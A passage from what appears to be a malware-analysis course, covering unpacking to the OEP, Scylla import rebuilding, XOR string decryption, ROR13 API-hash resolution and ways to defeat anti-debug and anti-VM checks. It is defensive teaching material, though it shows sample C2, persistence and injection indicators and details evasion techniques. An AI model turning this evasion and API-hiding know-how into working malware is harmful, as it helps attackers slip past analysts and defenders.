    6. The hardware BP fires when the packer reads its saved registers back (POPAD or a run of POPs) on the way out of the stub
    7. You are now at or very near the OEP: look for the tail jump and the original prologue

Technique 2: memory BP on the unpacked region:
    1. Let the packer run partially and identify the region being written (memory map)
    2. Set a memory execute BP on that region (right-click → breakpoint → execute)
    3. Press F9: fires when the packer transfers control to the decompressed code
    4. Step forward carefully: the first instruction executed in the new region is usually the OEP

Technique 3: recognise the tail jump:
    Most packer stubs end with a jump to the OEP. In disassembly it looks like:
    00A01F80  5F       pop edi
    00A01F81  5E       pop esi
    00A01F82  5B       pop ebx
    00A01F83  FF E0    jmp eax    ; ← indirect jump to OEP (eax = OEP address)
    Step to this JMP, read the EAX value: that is the OEP. Set a BP there.
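Technique 3 can be roughly automated by scanning a dumped stub for register pops (or POPAD) followed directly by an indirect `jmp reg`. This is a heuristic sketch for 32-bit code only; `find_tail_jumps` is a hypothetical helper, and a raw byte scan will produce false positives in data or mid-instruction, so every hit needs checking in the disassembler.

```python
import re

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Two or more POP r32 (58-5F) or a POPAD (61), then JMP r32 (FF E0-E7)
TAIL_JUMP = re.compile(rb"(?:[\x58-\x5f]{2,}|\x61)\xff([\xe0-\xe7])", re.DOTALL)

def find_tail_jumps(code: bytes, base: int = 0):
    """Return (address_of_jmp, register) for each candidate tail jump in `code`."""
    hits = []
    for match in TAIL_JUMP.finditer(code):
        jmp_addr = base + match.start(1) - 1      # address of the FF opcode byte
        register = REGS[match.group(1)[0] - 0xE0]
        hits.append((jmp_addr, register))
    return hits

# Two NOPs followed by the pop/pop/pop/jmp eax sequence from the listing above
stub = bytes.fromhex("90905F5E5BFFE0")
for addr, reg in find_tail_jumps(stub, base=0xA01F7E):
    print("candidate tail jump at %08X via %s" % (addr, reg))
```

Setting a breakpoint on each candidate and reading the register when it fires gives the OEP without single-stepping through the whole stub.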

Dumping and Fixing the Unpacked Binary

Scylla: dumping process memory and rebuilding the import table

Once paused at OEP in x64dbg:

Step 1: Dump the process memory
    Plugins → Scylla → OEP address auto-filled from current EIP
    Click "Dump" → saves process memory to unpacked_dump.exe

Step 2: Rebuild the Import Table
    Problem: the dumped PE has an IAT with invalid addresses (packer modified it)
    In Scylla: click "IAT Autosearch" → Scylla scans memory for valid IAT
    If found: click "Get Imports" → displays all resolved imports
    Click "Fix Dump" → patches the dumped file with corrected IAT
    Result: unpacked_dump_SCY.exe, analysable in Ghidra/IDA

Step 3: Verify in Ghidra
    Import unpacked_dump_SCY.exe into Ghidra → run analysis
    Should now show: full import table with 40+ imports
    Strings should be visible (the real strings, not the packer's)
    If Ghidra can't load it: PE reconstruction partially failed; adjust OEP or retry Scylla

Verifying the Dump — Before and After

After Scylla produces the fixed dump, a quick hex inspection confirms the PE header is intact and the IAT has been rebuilt correctly. The MZ/PE signatures should be present at their expected offsets and the import directory should point to valid RVAs.

Unpacked PE Header — Confirming Successful Dump and IAT Reconstruction

Offset    00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F   Field
0x000000  4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00   ← MZ signature intact
0x00003C  E8 00 00 00                                       ← e_lfanew → PE header at 0xE8
0x0000E8  50 45 00 00 64 86 06 00 A4 B3 C2 65 00 00 00 00   ← PE sig + machine x64 + 6 sections

IAT directory entry (data directory 12, at Optional Header + 0xD0 for PE32+; the optional header starts at 0x100 here):
0x0001D0  C0 52 00 00 xx xx xx xx                           ← IAT RVA 0x52C0 (VA 0x4052C0 with image base 0x400000) and size, rebuilt by Scylla

First few 8-byte entries of the rebuilt IAT at RVA 0x52C0 (RVA = VA 0x4052C0 - image base; it matches the file offset only when the dump stores sections at their virtual offsets):
0x0052C0  00 13 40 00 00 00 00 00 10 13 40 00 00 00 00 00   ← two thunk entries (the loader overwrites these with API addresses at load time)

Compare with the packed binary: the IAT RVA was 0x00000000 (null); Scylla populated it
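The same header check can be scripted. In a PE32+ file the data-directory table starts 0x70 bytes into the optional header and each entry is 8 bytes (RVA, then size); entry 1 is the import directory and entry 12 is the IAT. The sketch below uses only the standard library and runs against a synthetic header built in the script; the `data_directory` name and the size value 0x100 are assumptions for the example.

```python
import struct

IMPORT_DIRECTORY, IAT_DIRECTORY = 1, 12

def data_directory(data: bytes, index: int):
    """Return (rva, size) of data directory `index` after validating MZ/PE signatures."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    optional = e_lfanew + 4 + 20              # signature + 20-byte COFF file header
    (magic,) = struct.unpack_from("<H", data, optional)
    if magic == 0x20B:                        # PE32+ (64-bit)
        table = optional + 0x70
    elif magic == 0x10B:                      # PE32 (32-bit)
        table = optional + 0x60
    else:
        raise ValueError("unknown optional header magic")
    return struct.unpack_from("<II", data, table + 8 * index)

# Synthetic header for the demo: e_lfanew = 0xE8, x64 machine, 6 sections
header = bytearray(0x200)
header[0:2] = b"MZ"
struct.pack_into("<I", header, 0x3C, 0xE8)
header[0xE8:0xEC] = b"PE\x00\x00"
struct.pack_into("<HH", header, 0xEC, 0x8664, 6)
struct.pack_into("<H", header, 0x100, 0x20B)
struct.pack_into("<II", header, 0x1D0, 0x52C0, 0x100)   # hypothetical IAT entry

rva, size = data_directory(bytes(header), IAT_DIRECTORY)
print(hex(rva), hex(size))    # 0x52c0 0x100
```

To check a real dump, read the file into `data` and call the function for both indices; an RVA of zero means that directory is absent, which is the usual symptom of a dump whose imports were not rebuilt.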

Automated Unpacking

For volume analysis, manual unpacking of every packed sample is impractical. Several automated approaches exist for common packers:

unpac.me — cloud-based automated unpacking service; supports hundreds of packer families; returns the unpacked binary with the detected packer family name
Qiling Framework — Python-based binary emulation; scripts can emulate the packer stub to OEP without needing a real Windows machine or debugger
CAPE Sandbox — Cuckoo fork specifically designed for malware unpacking; automatically captures the unpacked payload from memory and saves it as a separate artefact
Dynamic analysis approach — even without unpacking, dynamic analysis in a monitored VM captures the real behaviour; pair with a memory dump at execution time for Volatility analysis on the unpacked in-memory image

Key Takeaways — Chapter 4

The ESP trick (a hardware BP on the stack location where the stub saved its registers) works reliably for most single-layer packers: it fires when the packer reads that saved context back just before transferring control to the OEP
The tail jump pattern, a series of register pops followed by JMP EAX or PUSH addr; RET, is the most common OEP transfer mechanism; recognising it visually is often quicker than the breakpoint-based techniques
Scylla's IAT reconstruction is essential after dumping — the dump alone has an invalid import table; Fix Dump produces the correctly rebased and import-patched binary that Ghidra can analyse
If IAT autosearch fails, examine the OEP region manually for the GetProcAddress calls the unpacked code uses to self-resolve its imports, then enter the IAT start address and size in Scylla by hand
For known packers at scale, unpac.me is faster than manual unpacking — reserve manual unpacking for custom packers and novel protectors that automated services can't handle

Chapter 05 · ~15 min · Unpacking & Deobfuscation Advanced Static

Deobfuscation Techniques

XOR decryption loops, base64 variants, control flow obfuscation — opaque predicates and dispatcher patterns, and Ghidra scripting for automated deobfuscation

Obfuscation is the set of techniques used to make code harder to understand without changing what it does. Packing hides the code entirely; obfuscation makes the visible code confusing. The two are often combined: a packed binary that, once unpacked, contains heavily obfuscated code. This chapter covers the most common obfuscation techniques encountered in malware and the analytical approaches to defeat each.

XOR Decryption — Identifying and Scripting

XOR is the most common obfuscation technique in malware. A key byte (or sequence of bytes) is XOR'd with each byte of the obfuscated data. In Ghidra's disassembly, an XOR decryption routine looks like a loop that reads one byte, XORs it with a constant, and writes it back. The constant is the key.

XOR Decryption Loop: identifying the key and writing a Python decryption script

Ghidra decompiler output for an XOR decryption function:

    void decrypt_config(byte* buf, int len) {
        for (int i = 0; i < len; i++) {
            buf[i] = buf[i] ^ 0x4B;    // ← KEY IS 0x4B
        }
    }

The encrypted data is at VA 0x403020, length 0x80 bytes. Extract it from the binary and decrypt with Python:

    with open('sample.exe', 'rb') as f:
        # File offset of VA 0x403020: subtract the image base (0x400000) to get RVA 0x3020,
        # then map the RVA through the section table. The value 0x2020 implies that the
        # containing section starts at RVA 0x3000 and at raw file offset 0x2000.
        f.seek(0x2020)
        encrypted = bytearray(f.read(0x80))

    decrypted = bytes(b ^ 0x4B for b in encrypted)
    print(decrypted)    # prints the config in plaintext
    # b'http://update-service.net/api/v2/check\x00Global\\MicrosoftUpdateMutex\x00...'
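The VA-to-file-offset step is where extraction scripts most often go wrong, because the offset depends on the section table and not only on the image base. A minimal sketch of the conversion follows; the section layout is hypothetical, chosen so that VA 0x403020 maps to file offset 0x2020 as in the example above, and `va_to_file_offset` is an illustrative helper.

```python
from collections import namedtuple

Section = namedtuple("Section", "name virtual_address virtual_size raw_offset raw_size")

def va_to_file_offset(va: int, image_base: int, sections) -> int:
    """Map a virtual address to a file offset using the PE section table."""
    rva = va - image_base
    for s in sections:
        span = max(s.virtual_size, s.raw_size)
        if s.virtual_address <= rva < s.virtual_address + span:
            delta = rva - s.virtual_address
            if delta >= s.raw_size:
                raise ValueError("address is in uninitialised data with no file backing")
            return s.raw_offset + delta
    raise ValueError("address is not inside any section")

# Hypothetical layout for sample.exe (real values come from the section headers)
SECTIONS = [
    Section(".text", 0x1000, 0x1C00, 0x0400, 0x1C00),
    Section(".data", 0x3000, 0x0400, 0x2000, 0x0400),
]
print(hex(va_to_file_offset(0x403020, 0x400000, SECTIONS)))   # 0x2020
```

With the third-party pefile library, `pe.get_offset_from_rva(rva)` performs the same lookup against the real headers, which avoids transcribing the section table by hand.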

Multi-byte XOR and Rolling Key

Rolling XOR Key: the key advances with each byte (common in C2 config encryption)

Ghidra decompiler output for a rolling-key XOR:

    void decrypt_strings(byte* buf, int len) {
        byte key = 0xAA;                  // ← initial key byte
        for (int i = 0; i < len; i++) {
            buf[i] ^= key;
            key = (key + 0x07) & 0xFF;    // ← key advances by 0x07 each byte
        }
    }

Python decryption for the rolling key:

    # `encrypted` holds the bytes read from the sample, as in the single-byte example
    key = 0xAA
    decrypted = bytearray()
    for b in encrypted:
        decrypted.append(b ^ key)
        key = (key + 0x07) & 0xFF    # mirror the key-advance logic exactly
    print(bytes(decrypted))

Control Flow Obfuscation

Control flow obfuscation makes the logical structure of code difficult to follow without changing its behaviour. Three patterns appear frequently in protected malware:

Control Flow Obfuscation Patterns: opaque predicates, junk code, and the dispatcher pattern

Pattern 1: opaque predicate (always-true or always-false branch):
    00401200  33 C0       xor eax, eax       ; eax = 0, so the outcome of the test below is fixed
    00401202  85 C0       test eax, eax      ; ZF is ALWAYS 1 after xor eax, eax
    00401204  75 20       jnz 00401226       ; NEVER taken: dead branch designed to confuse
    00401206                                 ; real code continues here; the jnz was always fake

Pattern 2: junk code insertion:
    004012A0  90          nop                ; filler
    004012A1  87 DB       xchg ebx, ebx      ; swap ebx with itself, does nothing
    004012A3  8D 40 00    lea eax, [eax+0]   ; load eax+0 into eax, does nothing
    004012A6  ...                            ; eventually reaches real instruction

Pattern 3: dispatcher (flattened control flow):
    All basic blocks jump to a central dispatcher node.
    The dispatcher reads a "state variable" and routes to the next block.
    The logical sequence: block 1 → block 5 → block 2 → block 7
    But in the graph, every block goes to the dispatcher first.
    Defeat: track state variable values through x64dbg to recover the actual sequence.
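The dispatcher pattern is easier to reason about as a small state machine. The sketch below models a flattened function as a table from state value to (block, next state) and records the order in which blocks actually run; the state values are invented for the example, and in practice they would be the constants observed in the state variable while stepping in x64dbg.

```python
def run_flattened(blocks: dict, start_state: int) -> list:
    """Follow the state variable through the dispatcher and return the block order."""
    trace = []
    state = start_state
    while state is not None:                 # one iteration = one trip through the dispatcher
        label, next_state = blocks[state]
        trace.append(label)
        state = next_state                   # each block ends by writing the next state
    return trace

# state value -> (block executed, state written before returning to the dispatcher)
BLOCKS = {
    0x1A: ("block 1", 0x7F),
    0x7F: ("block 5", 0x03),
    0x03: ("block 2", 0x55),
    0x55: ("block 7", None),                 # None marks the function exit
}
print(" -> ".join(run_flattened(BLOCKS, 0x1A)))
# block 1 -> block 5 -> block 2 -> block 7
```

Once the table is filled in from observed values, the recovered order can be written back into the static analysis as comments or block labels, which turns the flat graph back into a readable sequence.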

Ghidra Scripting for Automated Deobfuscation

Ghidra Script: Python script to decrypt XOR-obfuscated strings in the binary

    # Ghidra Script Manager: Window → Script Manager → New Script → Python
    # Avoids constructs that behave differently under Jython 2.7 and Python 3
    XOR_KEY  = 0x4B
    DATA_VA  = 0x403020    # virtual address of encrypted string table
    DATA_LEN = 0x200       # length of the string table

    addr = toAddr(DATA_VA)
    # getBytes() returns signed Java bytes, so mask each one to the range 0-255
    data = [b & 0xFF for b in getBytes(addr, DATA_LEN)]
    decrypted = bytearray(b ^ XOR_KEY for b in data)

    print("[+] Decrypted strings:")
    for s in decrypted.split(b'\x00'):
        if len(s) > 3:
            print("    " + s.decode('latin-1'))

    # Output:
    #     http://update-service.net/api/v2/check
    #     Global\MicrosoftUpdateMutex
    #     C:\ProgramData\MsUpdate\svchost32.exe
    #     HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Key Takeaways — Chapter 5

XOR decryption loops are identifiable by their structure — a loop that reads a byte, XORs with a constant, and writes it back; the constant is the key; extract the data and key and decrypt with a three-line Python script
Rolling keys advance the key value with each byte — mirror the key-advancement arithmetic exactly in your decryption script; even a tiny difference (wrong modulus, wrong increment) produces garbage output
Opaque predicates are always-true or always-false branches that exist only to confuse analysis tools — in x64dbg, run to the branch and observe whether it is always taken or always not-taken, then treat the dead branch as dead code
The dispatcher / flattened control flow pattern is the most time-consuming obfuscation to defeat statically — use x64dbg to record the actual execution sequence by observing the state variable, then annotate Ghidra with the real block order
Ghidra's Python scripting API gives full access to the binary's bytes — automate decryption directly in Ghidra rather than extracting data to a separate script, so decrypted strings appear in the analysis context
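The rolling-key takeaway above can be illustrated with a short sketch. It assumes one common variant in which the key advances by a fixed step modulo 256 after every byte; the starting key, step, and `rolling_xor` helper are illustrative and must be replaced with whatever arithmetic the sample's loop actually performs.

```python
def rolling_xor(data, key, step, modulus=256):
    """XOR each byte with a key that advances by `step` (mod `modulus`, at most 256) per byte."""
    out = bytearray()
    for b in data:
        out.append(b ^ key)
        key = (key + step) % modulus   # mirror the sample's key-advancement arithmetic here
    return bytes(out)

plaintext = b"Global\\MicrosoftUpdateMutex"
encrypted = rolling_xor(plaintext, key=0x4B, step=3)

# XOR is symmetric, so the same routine with the same parameters decrypts.
print(rolling_xor(encrypted, key=0x4B, step=3))
# A wrong increment diverges after the first byte and yields garbage.
print(rolling_xor(encrypted, key=0x4B, step=5))
```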

Chapter 06 · ~14 min · Unpacking & Deobfuscation Advanced Static

API Hashing and Import Reconstruction

How API hashing works, common hash algorithms (ROR13, djb2), writing a hash resolver script, Scylla import reconstruction, and automated tools for known hashing schemes

API hashing is the technique used when even dynamic import resolution via GetProcAddress leaves too many strings in the binary. Instead of looking up "CreateRemoteThread" by name, the malware computes a hash of every export name in kernel32.dll and compares it to a hardcoded hash value. No API name string ever appears in the binary. From a static analysis perspective, the import table is empty and no strings reveal capability. This chapter covers how to defeat it.

How API Hashing Works

API Hash Resolution · ROR13 hash: how the malware finds CreateRemoteThread without naming it

Step 1: Malware finds the kernel32.dll base address via a PEB walk
; PEB → PEB_LDR_DATA → InMemoryOrderModuleList → 3rd entry = kernel32.dll
00401500  64 A1 30 00 00 00   mov eax, fs:[30h]     ; PEB address
00401506  8B 40 0C            mov eax, [eax+0Ch]    ; PEB_LDR_DATA
00401509  8B 40 14            mov eax, [eax+14h]    ; InMemoryOrderModuleList.Flink (1st entry, the EXE)
0040150C  8B 00               mov eax, [eax]        ; → 2nd entry (ntdll)
0040150E  8B 00               mov eax, [eax]        ; → 3rd entry (kernel32)
00401510  8B 40 10            mov eax, [eax+10h]    ; DllBase = kernel32.dll base

Step 2: Walk the kernel32 export table and hash each function name
; For each export name in kernel32's Export Name Table:
;   compute ROR13_hash(name)
;   if ROR13_hash == 0x72E2CAE7: this is CreateRemoteThread → save its address

Step 3: Call the resolved function
; No "CreateRemoteThread" string anywhere in the binary
; Only hash value 0x72E2CAE7 is present
call [resolved_fn_ptr]   ; calls CreateRemoteThread

Computing ROR13 Hashes — Building a Lookup Table

API Hash Solver · Python script: compute ROR13 hashes for all kernel32 exports and match them to constants from the binary

import pefile

def ror13(val, bits=32):
    """Rotate a 32-bit value right by 13 bits."""
    return ((val >> 13) | (val << (bits - 13))) & 0xFFFFFFFF

def hash_api(name: str) -> int:
    # Classic ROR13 hashes the export name exactly as exported (case-sensitive).
    # Some variants uppercase the name or also hash the module name; mirror the sample's loop.
    h = 0
    for c in name:
        h = (ror13(h) + ord(c)) & 0xFFFFFFFF   # mask every round so h stays 32-bit
    return h

# Build lookup table from kernel32 exports
pe = pefile.PE(r'C:\Windows\System32\kernel32.dll')
lookup = {}
for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
    if exp.name:
        name = exp.name.decode()
        lookup[hash_api(name)] = name

# Hashes extracted from the malware binary (via Ghidra search for dword constants)
malware_hashes = [0x72E2CAE7, 0xE553A458, 0x4FDAF6DA, 0x6EEB26FF]
for h in malware_hashes:
    print(f"0x{h:08X} → {lookup.get(h, 'NOT FOUND')}")

# Example output (constants are illustrative; exact values depend on the sample's hash variant):
# 0x72E2CAE7 → CreateRemoteThread
# 0xE553A458 → VirtualAllocEx
# 0x4FDAF6DA → WriteProcessMemory
# 0x6EEB26FF → OpenProcess
# ↑ This sample is a process injector, confirmed from API hashes alone

Finding Hash Values in the Binary

Ghidra: Finding API Hash Constants · Locating hardcoded hash values in the disassembly

In Ghidra: Search → For Scalars → size=4, find DWORD constants
Filter to the hash resolution function (look for it near the PEB walk)
The function compares a DWORD register against hardcoded constants; those are the hashes

Ghidra decompiler, hash comparison in resolve_api():

if (ror13_hash(export_name) == 0x72E2CAE7) {
    fn_table[0] = export_addr;   // CreateRemoteThread
}
if (ror13_hash(export_name) == 0xE553A458) {
    fn_table[1] = export_addr;   // VirtualAllocEx
}

After running the resolver script, annotate Ghidra:
Rename fn_table[0] call sites → CreateRemoteThread
Add comment to 0x72E2CAE7 constant → "ROR13('CreateRemoteThread')"

Key Takeaways — Chapter 6

API hashing leaves no API name strings in the binary — the only evidence is the hash constants and the PEB walk routine; identifying the PEB walk is the entry point to finding which APIs the malware uses
ROR13 is the most common API hashing scheme (used by Metasploit, Cobalt Strike shellcode, and many custom implants) — a precomputed lookup table of all Windows API names resolves all hashes in seconds
Once hashes are resolved, annotate Ghidra immediately with the correct API names — the downstream decompilation of every function that calls the resolved function table becomes readable
Different hashing schemes (djb2, FNV, custom) require identifying the hash function from its disassembly; the giveaway is a tight per-character loop that folds each byte into an accumulator (rotate-and-add for ROR13, multiply by 33 for djb2, XOR then multiply by a prime for FNV); adjust your Python implementation to match
Community tools like HashDB (OALabs) maintain databases of known API hashes for common malware families — check HashDB before writing a custom resolver
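For samples that use djb2 or FNV rather than ROR13, the resolver only needs a different hash function. The sketch below shows the textbook 32-bit forms of djb2 and FNV-1a and a generic lookup builder. It assumes the sample uses the unmodified algorithms; real implants often change the seed or multiplier, so compare the constants against the disassembly first. The `build_lookup` helper and the short export list are illustrative.

```python
def djb2(name):
    """Textbook djb2: h = h * 33 + c, seeded with 5381, truncated to 32 bits."""
    h = 5381
    for c in name.encode("ascii"):
        h = (h * 33 + c) & 0xFFFFFFFF
    return h

def fnv1a_32(name):
    """Textbook 32-bit FNV-1a: XOR the byte in, then multiply by the FNV prime."""
    h = 0x811C9DC5
    for c in name.encode("ascii"):
        h = ((h ^ c) * 0x01000193) & 0xFFFFFFFF
    return h

def build_lookup(names, hash_fn):
    """Map hash value -> API name for a list of export names."""
    return {hash_fn(n): n for n in names}

exports = ["OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"]
lookup = build_lookup(exports, djb2)
print(lookup.get(djb2("VirtualAllocEx"), "NOT FOUND"))
```

In practice `exports` would come from the same pefile export walk used for the ROR13 table.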

Part III · Chapters 7–8

Anti-Analysis and Evasion

Understanding and defeating the techniques malware uses to detect debuggers, virtual machines, and sandbox environments — and how to configure your analysis environment to see past them

Chapter 07 · ~15 min · Anti-Analysis & Evasion Evasion RE

Anti-Debugging Techniques

PEB flag detection, API-based checks, timing attacks, exception-based detection, heap flags, and defeating each technique with ScyllaHide and runtime patching

Anti-debugging is the set of techniques malware uses to detect that it is running under a debugger and alter its behaviour accordingly — typically by exiting, sleeping, or executing decoy code. Every technique described in this chapter has a countermeasure. The analyst's goal is not to eliminate anti-debugging from the sample but to neutralise it efficiently so analysis can proceed.

PEB-Based Detection

The Process Environment Block (PEB) contains two fields that Windows sets to indicate a debugger is attached. These are the most commonly used and easiest to detect checks.

PEB Flag Checks · BeingDebugged and NtGlobalFlag: what the assembly looks like

PEB.BeingDebugged (offset 0x02 in both the 32-bit and 64-bit PEB):
00401080  64 A1 30 00 00 00   mov   eax, fs:[30h]        ; PEB address (32-bit)
00401086  0F B6 40 02         movzx eax, byte [eax+2]    ; PEB.BeingDebugged (0 = no, 1 = debugger)
0040108A  85 C0               test  eax, eax
0040108C  75 xx               jnz   exit_or_decoy        ; taken only when a debugger is present

Defeat: in x64dbg, fill the JNZ with NOPs (right-click → Binary → Fill with NOPs) so the exit path is never taken,
  or zero the BeingDebugged byte in the dump before the check runs.
  Do not turn the JNZ into a JMP: that would always take the exit path.
Or: ScyllaHide → NtSetInformationThread + PEB patching → automated

NtGlobalFlag (PEB offset 0x68 in 32-bit, 0xBC in 64-bit), set to 0x70 when the process is created under a debugger:
004010C0  64 A1 30 00 00 00   mov eax, fs:[30h]
004010C6  8B 40 68            mov eax, [eax+68h]       ; PEB.NtGlobalFlag
004010C9  83 E0 70            and eax, 70h             ; mask for debug heap flags (FLG_HEAP_ENABLE_*)
004010CC  74 xx               jz  continue_execution   ; 0x70 → nonzero → falls through to the exit path

Defeat: the AND has already set the flags, so zeroing EAX at the JZ has no effect.
  Break at 0x004010CC → set ZF = 1 in the registers pane → F9 to continue
  (or break at 0x004010C9 and set EAX = 0 before the AND executes)
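When the same check has to be neutralised in a dumped or on-disk copy rather than interactively, the patch can be scripted. The following is a minimal sketch, assuming the check ends in a 2-byte short conditional jump (opcodes 0x70 to 0x7F) whose offset you have already located; `nop_short_jcc` is a hypothetical helper, not part of any tool.

```python
def nop_short_jcc(code, offset):
    """Return a copy of `code` with the 2-byte short Jcc at `offset` replaced by two NOPs."""
    opcode = code[offset]
    if not 0x70 <= opcode <= 0x7F:
        raise ValueError("no short conditional jump at offset %d" % offset)
    patched = bytearray(code)
    patched[offset:offset + 2] = b"\x90\x90"
    return bytes(patched)

# movzx eax, byte [eax+2] ; test eax, eax ; jnz +0x10
check = bytes.fromhex("0FB64002" "85C0" "7510")
print(nop_short_jcc(check, 6).hex())
```

Refusing to patch anything that is not a short Jcc is deliberate: a wrong offset then fails loudly instead of corrupting an unrelated instruction.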

API-Based Detection

API Anti-Debug Checks · IsDebuggerPresent, CheckRemoteDebuggerPresent, NtQueryInformationProcess

IsDebuggerPresent (simplest, most common):
00401200  FF 15 xx xx xx xx   call ds:IsDebuggerPresent
00401206  85 C0               test eax, eax
00401208  75 xx               jnz  debugger_found

Defeat: ScyllaHide makes the call return 0; or NOP the call and zero EAX manually

NtQueryInformationProcess (ProcessDebugPort), harder to defeat:
00401280  6A 00               push 0                    ; ReturnLength (NULL)
00401282  6A 04               push 4                    ; ProcessInformationLength (4 bytes)
00401284  68 xx xx xx xx      push offset debug_port    ; ProcessInformation buffer
00401289  6A 07               push 7                    ; ProcessInformationClass = 7 (ProcessDebugPort)
0040128B  6A FF               push -1                   ; hProcess = current process
0040128D  FF 15 xx xx xx xx   call ds:NtQueryInformationProcess
; debug_port will be nonzero if a debugger is attached

Defeat: ScyllaHide; or break on the instruction after the call and zero the debug_port value

Timing-Based Detection

Timing Attacks · RDTSC delta and GetTickCount: detecting debugger-induced slowdown

RDTSC delta check (measures CPU clock cycles between two reads):
00401300  0F 31            rdtsc                 ; read TSC → EDX:EAX (t1)
00401302  89 45 F8         mov [ebp-8], eax      ; save t1
...       (some operations between the two reads)
00401320  0F 31            rdtsc                 ; read TSC → EDX:EAX (t2)
00401322  2B 45 F8         sub eax, [ebp-8]      ; delta = t2 - t1
00401325  3D 00 40 00 00   cmp eax, 0x4000       ; threshold: 16384 cycles
0040132A  77 xx            ja  debugger_found    ; if delta too large → debugger

Defeat options:
1. ScyllaHide: its timing hooks cover API-based timers such as GetTickCount; RDTSC is a CPU instruction rather than an API call, so confirm the check is actually neutralised and fall back to option 3 if it is not
2. x64dbg plugin: rdtsc_fuzzer → randomises RDTSC return values
3. Manual: BP at 0x00401325 (the CMP) → set EAX to 0 → F9 to continue (at the JA the flags are already set, so changing EAX there is too late)

ScyllaHide — Automated Anti-Debug Bypass

ScyllaHide is an x64dbg plugin that automatically handles the most common anti-debugging techniques. It intercepts relevant API calls, patches PEB fields, and emulates timing functions to present a clean environment to the malware. For most commodity malware, enabling ScyllaHide before analysis makes anti-debug bypassing essentially automatic.

ScyllaHide · Recommended configuration for commodity malware analysis

x64dbg → Plugins → ScyllaHide → Options:
✓ PEB BeingDebugged              patch to 0
✓ PEB NtGlobalFlag               patch to 0
✓ PEB HeapFlags                  patch heap flags
✓ NtSetInformationThread         hide from debugger
✓ IsDebuggerPresent              hook → return 0
✓ CheckRemoteDebuggerPresent     hook → return FALSE
✓ NtQueryInformationProcess      hook ProcessDebugPort
✓ GetTickCount and timing APIs   return consistent values (RDTSC is an instruction, handle it manually)
✗ OutputDebugString trick        leave OFF (rarely used, causes instability)

For sophisticated samples (Themida, VMProtect): ScyllaHide may be insufficient.
Supplement with: manual breakpoints at detection functions, x64dbg conditional BPs

Key Takeaways — Chapter 7

PEB.BeingDebugged and NtGlobalFlag are the most common checks — ScyllaHide patches both automatically; for manual bypass, patch the conditional jump after the check or zero the result register before the branch
NtQueryInformationProcess with ProcessDebugPort (class 7) is harder to defeat than IsDebuggerPresent because it asks the kernel instead of reading a user-mode PEB byte; ScyllaHide handles it by hooking the ntdll.dll system call stub
RDTSC timing checks fire because execution is much slower when you single-step or hit breakpoints between the two reads; ScyllaHide's timing hooks cover API-based timers, while an RDTSC check usually needs a manual bypass: set the delta register below the threshold before the comparison executes
Hardware breakpoints don't insert INT3 bytes and are therefore invisible to byte-scanning anti-debug checks — prefer hardware BPs over software BPs when analysing protected samples
Exception-based detection works by generating an exception and checking whether a debugger caught it before the program's exception handler — ScyllaHide's exception handling hooks neutralise this class of check

Chapter 08 · ~14 min · Anti-Analysis & Evasion Evasion RE

Anti-VM and Anti-Sandbox Techniques

CPUID hypervisor detection, VM artefact enumeration, timing differentials, user interaction and locale checks, and defeating each at the analysis environment level

Anti-VM and anti-sandbox techniques are structurally similar to anti-debugging: the malware checks for indicators of a controlled analysis environment and changes behaviour if it detects one. The key difference is scale — anti-debugging is defeated once per debugging session; anti-VM must be defeated at the analysis environment configuration level, before samples are even run, because reconfiguring a VM per-sample is impractical at volume.

CPUID-Based Hypervisor Detection

CPUID Hypervisor Bit · Checking the hypervisor-present bit in CPUID leaf 1

CPUID leaf 0x01, bit 31 of ECX = "Hypervisor Present" bit:
00401400  B8 01 00 00 00      mov  eax, 1            ; CPUID leaf 1
00401405  0F A2               cpuid                  ; execute CPUID instruction
00401407  F7 C1 00 00 00 80   test ecx, 80000000h    ; check bit 31 of ECX
0040140D  75 xx               jnz  vm_detected       ; nonzero = running under a hypervisor

Reading the hypervisor vendor string (CPUID leaf 0x40000000):
00401420  B8 00 00 00 40      mov  eax, 40000000h    ; hypervisor leaf
00401425  0F A2               cpuid                  ; EBX:ECX:EDX = vendor string
; VMware: "VMwareVMware", VirtualBox: "VBoxVBoxVBox"

Defeat: in the VM's .vmx file, hypervisor.cpuid.v0 = "FALSE" is the commonly cited setting for clearing the hypervisor-present bit the guest sees
Set "cpuid.hypervisorVendorId" to a random string in the .vmx file
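When you see register values in a debugger after the CPUID instructions above, the following sketch shows how they decode. It assumes you have copied the raw 32-bit values of ECX (leaf 1) and EBX, ECX, EDX (leaf 0x40000000) from the registers pane; the helper names are hypothetical.

```python
import struct

HYPERVISOR_BIT = 1 << 31   # CPUID leaf 1, ECX bit 31

def hypervisor_present(ecx_leaf1):
    """True when the hypervisor-present bit is set in ECX from CPUID leaf 1."""
    return bool(ecx_leaf1 & HYPERVISOR_BIT)

def hypervisor_vendor(ebx, ecx, edx):
    """Rebuild the 12-character vendor string from the leaf 0x40000000 registers."""
    return struct.pack("<III", ebx, ecx, edx).decode("ascii", errors="replace")

# Register values as they would appear for the VMware vendor string.
ebx, ecx, edx = struct.unpack("<III", b"VMwareVMware")
print("EBX=%08X ECX=%08X EDX=%08X" % (ebx, ecx, edx))
print(hypervisor_vendor(ebx, ecx, edx))
print(hypervisor_present(0x80000000), hypervisor_present(0x7FFAFBFF))
```

The register order EBX, ECX, EDX matters: leaf 0 (the CPU vendor string) uses EBX, EDX, ECX instead, which is a common source of scrambled output.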

VM Artefact Enumeration

VM Artefact Checks · Registry keys, process names, MAC address OUI, disk size checks

Registry-based VM detection (common targets):
HKLM\SOFTWARE\VMware, Inc.\VMware Tools
HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions
HKLM\HARDWARE\ACPI\DSDT\VBOX__
HKLM\SYSTEM\ControlSet001\Services\VBoxGuest
Defeat: rename/delete these registry keys in the analysis VM (automated via a cleanup script)

Process name enumeration (malware lists running processes):
vmtoolsd.exe, vmwaretray.exe (VMware Tools)
VBoxService.exe, VBoxTray.exe (VirtualBox)
vmsrvc.exe, vmusrvc.exe (Virtual PC)
wireshark.exe, procmon.exe, ida.exe, x64dbg.exe
Defeat: rename analysis tools; stop/uninstall VMware Tools or rename its processes

MAC address OUI check:
00:0C:29 = VMware
